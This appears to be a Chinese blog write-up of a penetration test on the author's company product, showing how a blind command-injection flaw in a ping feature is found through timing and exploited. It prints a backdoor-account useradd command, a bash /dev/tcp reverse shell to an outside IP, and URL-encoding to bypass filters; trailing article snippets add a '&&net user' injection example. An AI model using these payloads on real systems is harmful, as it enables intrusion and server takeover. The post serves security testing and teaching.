命令执行漏洞挖掘实例

最新推荐文章于 2024-07-04 09:24:56 发布
最新推荐文章于 2024-07-04 09:24:56 发布
阅读量2.4k 收藏 16
点赞数 3
分类专栏: web安全 文章标签: 命令执行注入 安全测试 漏洞 实例 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/100013278
版权

前言

这两天给公司的产品做安全测试,有个比较经典的命令执行漏洞感觉还挺有意思,写出来记录一下

一: 前期判断

看到这里有个网络检测,感觉就有命令执行 的漏洞,抓包就试试看
在这里插入图片描述
输入127.0.0.1本地地址,发现能ping通
在这里插入图片描述
发现如果命令不正确或者ip地址不存在,返回包为false。因此即使存在命令执行的漏洞也无法回显。那这里就考虑用延时判断是不是存在命令执行漏洞

二:判断是否存在命令执行注入

其实之前走了很多歪路,这里就不提了。ping命令有个参数,-c 表示icmp要发几个包。这里我们通过 修改-c 的数目,理论上-c的数值越大,那返回的时间越长
这里遇到第一个问题
在这里插入图片描述
添加参数报错,这里空格处通过%20替代,因为http包有url转码,所以%20到服务器端会解析为空格,成功绕过
-c 1 时,时间59毫秒
在这里插入图片描述
-c 2 ,时间为4086毫秒
在这里插入图片描述
从这里的话,就知道-c 这个参数已经带入成功,那在尝试拼接命令。拼接命令使用&&,&,|,||等,都试了,感觉不是很合适,因为前面命令一旦执行成功,页面上马上就回显回来,无法通过时间来判断。这里我使用分号;做拼接,分号后面都命令执行完之后,这个包才能判断true or false
尝试127.0.0.1 -c 1;sleep 1
这里 -c 参数不要太大,时间久了默认就false,sleep也不宜过大,只要能体现页面回显的时间变化就可以
t = 4086
在这里插入图片描述
127.0.0.1 -c 1;sleep 2
t = 8069
在这里插入图片描述
到这里就很明确,sleep命令已经执行成功,且存在命令执行注入漏洞

三:通过命令执行注入获取服务器权限

这里也卡了一段时间,最后解决就很快。想过2个方法获得服务器权限。
一个的话通过一句话命令新增用户,到时候直接连服务器就可以。
如新建test:123456用户
useradd -p `openssl passwd -1 -salt 'salt' 123456` test
另外一个就是反弹shell
bash -i >& /dev/tcp/192.168.96.111/4444 0>&1
但是呢,这两条命令都有特殊符号,特别像&,如果空格可以用%20绕过都话,其他字符在绕过上我还没啥思路,会报请求错误
在这里插入图片描述
到这里又卡了一下,难道命令注入找到了,却无法利用,这就有点尴尬了,后来忽然想起来,空格能通过url编码绕过,那整个请求参数值能做一遍url编码不是也可以嘛,试试看
在这里插入图片描述
开启监听
在这里插入图片描述
将编码后的参数替换,放包,虽然一直卡着,当监听的shell已经回来,成功拿到服务器权限
在这里插入图片描述
在这里插入图片描述

到这里就结束了,关于那第三节,不知道有没有不通过编码的绕过方式,如果有,感谢指教~

sojrs_sec
关注
  • 3
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
命令执行漏洞
Amity111的博客
01-13 228
先来查看一下dvwa中命令执行漏洞源码: <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ];//对输入没有任何过滤 // Determine OS and execute the ping command. if (stristr(php_uname('s'), 'Windows NT')) { /...
信息泄露漏洞挖掘技巧20200429.docx
04-29
总计信息泄露漏洞的挖掘、利用、修补方式,主要包括.svn源代码泄露.git源代码泄露、httpsys漏洞检测以及利用方式,常见中间件的后台登录页面以及默认用户名密码。用于挖掘常见信息泄露漏洞,仅供学习使用
【网络安全命令执行漏洞
边缘拼命划水的小陈
04-19 1365
等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为。使用webshell工具连接。linux 操作系统。
web常见漏洞——命令注入
最新发布
2301_78300030的博客
07-04 655
1. 某网站的 Ping 命令执行页面:服务器使用的是 Windows Server 系统,在文本框中输入 8.8.8.8&&net user ,利用 && 符号连接了 ping 8.8.8.8 和 net user 两个命令,成功注入并获取到 net user 命令执行结果,显示了系统用户信息。这个示例中,我们使用`Runtime.exec()`方法执行了一个`ping`命令,然后通过`BufferedReader`读取命令执行结果的输入流,并将结果输出到控制台。// 获取命令执行结果的输入流。
实战SRC漏洞挖掘全过程,流程详细【网络安全
主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。
05-12 5068
记录一次完整的某SRC漏洞挖掘实战,为期一个多星期。文章有点长,请耐心看完,记录了完整的SRC漏洞挖掘实战一句话,柿子要挑软的捏。渗透测试思路最重要,每个人在做渗透测试时的思路都不同,有思路有想法才能进行下去。为了回馈铁杆粉丝们,我给大家整理了完整的软件测试视频学习教程,朋友们如果需要可以自行免费领取 【保证100%免费】
命令执行漏洞挖掘技巧分享
xv7777666的博客
04-23 285
2.业务逻辑处理直接拼接用户可控参数区执行系统命令或者拼凑回调函数代码,中途无任何安全过滤比如说: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。还有哪些地方可能存在命令执行呢?我们常常知道,命令执行漏洞多数在白盒测试中被挖掘出来,即使我们挖了命令执行,也只是第三方的框架漏洞居多!
RCE远程命令执行漏洞挖掘思路
gududeajun的博客
09-01 3562
RCE漏洞存在的地方包括:在url参数上,文件下载处,在查看图片,查看文件等地方在文件删除上,SSRF可能存在的地方,变量参数提交的地方等
SRC漏洞挖掘实战经验总结
10-28
在网络安全领域,SRC(Security Response Center)漏洞挖掘是至关重要的工作,它涉及到对软件系统进行深入分析,找出可能存在的安全漏洞,并及时修复,以保护用户数据的安全。本篇文章将基于"SRC漏洞挖掘实战经验...
数据治理 安卓app漏洞挖掘浅析及案例 - linux.zip
11-06
虽然SSH主要用于远程登录和命令执行,但在安卓APP中,它可能用于安全地连接到服务器,比如在后台同步数据或者进行设备管理。然而,如果SSH配置不当,可能会成为黑客攻击的入口,因此必须谨慎使用并定期更新密钥。 ...
WEB漏洞挖掘速成训练营.pptx
10-15
WEB漏洞挖掘速成训练营】是一门针对网络安全专业人员的培训课程,旨在提升学员对Web应用程序漏洞识别和利用的能力。课程重点介绍了多种常见的Web漏洞类型,并提供了详细的挖掘技术和实战案例。以下是其中涵盖的...
漏洞详情之挖掘浅析-漏洞银行大咖面对面27-秋色伊人
01-08
- **成因**:程序设计时未能有效过滤或验证用户输入的数据,使得恶意SQL命令得以执行。 - **防御措施**: - 使用预编译的参数化查询来避免SQL注入。 - 实施严格的输入验证,只接受预期格式的输入。 - 对特殊字符...
php漏洞和挖掘
11-13
PHP漏洞挖掘是网络安全领域中的重要课题,因为任何软件都可能存在安全漏洞,PHP也不例外。这些漏洞可能导致敏感信息泄露、系统被非法控制或者数据被篡改,对企业和用户的权益构成威胁。因此,理解和掌握PHP漏洞及其...
中间件漏洞详解
10-26
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
安全测试命令执行漏洞【建议收藏】
HSS919的博客
03-16 253
什么是文件包含漏洞程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 如果要使用远程包含功能,首先需要确定PHP是否已经开启远程包含功能选项(php默认关闭远程包含功能:allow_url_include=off),开启远程包含功能需要在php.ini配置文件中修改。 远程包含与本地包含没有区别,无非是支持远程加载,更容易getshell,无论是哪种扩展名,只要遵循PHP语法规范,PHP解析器就会对其解析。
web渗透测试----9、命令执行漏洞
七天
01-18 1769
文章目录一、简介二、举例说明三、PHP命令执行实例一:命令执行实例二:代码执行实例三:动态函数调用实例四:PHP函数代码执行漏洞四、Java命令执行五、常见注入方式六、常见无回显的利用方式6.1、使用时间延迟检测无回显命令注入6.2、通过重定向输出来进行无回显命令注入6.3、利用带外通道技术(OOB)6.4、bash反弹shell七、防御附件:一些常见语言的危险函数 一、简介 命令注入漏洞通常是通过注入恶意的命令参数,拼接原本正常的命令语句,达到执行恶意命令目的的一类漏洞。 系统命令是可以连接执行的,在没
漏洞挖掘命令注入漏洞
kali_Ma的博客
12-15 970
受影响的Bitbucket Server 和 Data Center版本存在使用环境变量的命令注入漏洞,具有控制其用户名权限的攻击者可以在系统上执行任意命令
漏洞挖掘入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
bigbangbangbang1的博客
07-11 2746
希望这篇文章在可以帮助你解开一些对于漏洞挖掘的谜团。在学习和研究漏洞挖掘的过程中遇到困难并感到不知所措是很正常的。不过学习的过程就是这样,只有不断的去尝试才会进步。祝你在漏洞挖掘的路上走的越来越远。
Web安全 RCE漏洞命令执行漏洞的 测试和利用).
网络安全领域___专研者.
02-17 4248
系统命令执行的 概括: 系统命令执行一般是在Web应用中,可能有时候需要调用一些系统命令执行,而程序在开发的时候没有对输入进行严格的过滤,导致恶意用户可以构造一些恶意的系统命令,从而达成系统命令执行攻击。 系统命令执行的危害: (1)可以使用Web程序的权限来执行执行系统的命令.(包含读写文件的) (2)利用写入的木马可以连接服务器(反弹shell). (3)进行进一步的渗透,从而可以控制整个网站甚至服务器.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值